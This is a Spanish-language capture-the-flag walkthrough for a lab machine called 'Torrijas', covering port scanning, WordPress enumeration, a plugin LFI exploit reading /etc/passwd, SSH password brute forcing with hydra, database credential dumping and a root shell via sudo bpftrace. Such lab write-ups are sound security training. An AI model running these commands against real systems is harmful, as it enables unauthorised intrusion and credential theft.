# Torrijas
### 馃攳 **RECONOCIMIENTO**
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 192.168.1.66
```
para verificar la conectividad de red.
A continuaci贸n, se realiza el comando:
```bash
nmap -p- --open 192.168.1.66 --min-rate 5000 -n
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH y** el **puerto 80** perteneciente al **servicio HTTP** est谩n abiertos por lo que a continuaci贸n se indagar谩 m谩s.
### 馃攷 **EXPLORACI脫N**
Se utiliza el comando:
```bash
sudo nmap -sCV -p22,80,3306 -v 192.168.1.66
```
para obtener m谩s informaci贸n sobre ese puerto espec铆ficamente.
Revisamos el puerto 80.
Ponemos el dominio **torrija.thl** en `/etc/hosts`. Tras esto realizamos un escaneo de directorios.
```
gobuster dir -u http://192.168.1.66 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,txt,php
```
Nos llama la atenci贸n que hay un **wordpress** por lo que indagamos m谩s en ese directorio.
Enumeramos los usuarios y los plugins con **WPScan**.
```
wpscan --url http://192.168.1.66/wordpress/ --enumerate u,vp
```
### 馃殌 **EXPLOTACI脫N**
Encontramos un usuario pero al realizar fuerza bruta no encuentra la contrase帽a. Entonces realizo un enumeraci贸n de plugins de manera agresiva.
```bash
wpscan --url http://192.168.1.66/wordpress --enumerate ap --force --plugins-detection mixed
```
Buscando los dos por Internet nos llama la atenci贸n el segundo ya que se puede realizar un **LFI**.
{% embed url="" %}
{% @github-files/github-code-block url="" %}
```
python3 CVE-2024-3673.py --url http://192.168.1.66/wordpress --file ../../../../../etc/passwd
```
Encontramos dos usuarios llamados **Primo** y **Premo** pero solo encontramos a trav茅s de fuerza bruta la contrase帽a de **Premo**.
```
hydra -l premo -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.66 -t 64
```
Nos conectamos con esas credenciales a trav茅s de SSH.
```bash
ssh premo@192.168.1.66
```
### 馃攼 PRIVILEGIOS
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar. No tenemos permisos SUDO.
En este caso, al estar trabajando con una instalaci贸n de **WordPress** y con el puerto **3306** (MySQL) expuesto, el siguiente paso ser谩 intentar obtener las credenciales de la base de datos. Un archivo crucial en WordPress que suele contener esta informaci贸n es el `wp-config.php`.
Nos conectamos a la base de datos.
```
mysql -u admin -p
```
Indagamos que tenemos en la base de datos.
```
show databases;
use wordpress;
show tables;
select * from wp_users;
```
Al ser la contrase帽a hasheada no nos sirve ya que estamos dentro pero probamos si podemos entrar en la base de datos de **root**.
```
mysql -u admin -p
show databases;
use Torrijas;
show tables;
select * from primo;
```
Nos logueamos con las credenciales.
{% embed url="" %}
```
sudo bpftrace -c /bin/sh -e 'END {exit()}'
```
Ya somos **root**.
Te deseo mucho 茅xito en tu b煤squeda de las flags! Recuerda prestar atenci贸n a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el 茅xito est谩 en la perseverancia y en no dejar ning煤n rinc贸n sin explorar. 隆Adelante, hacker! 馃捇馃攳馃殌
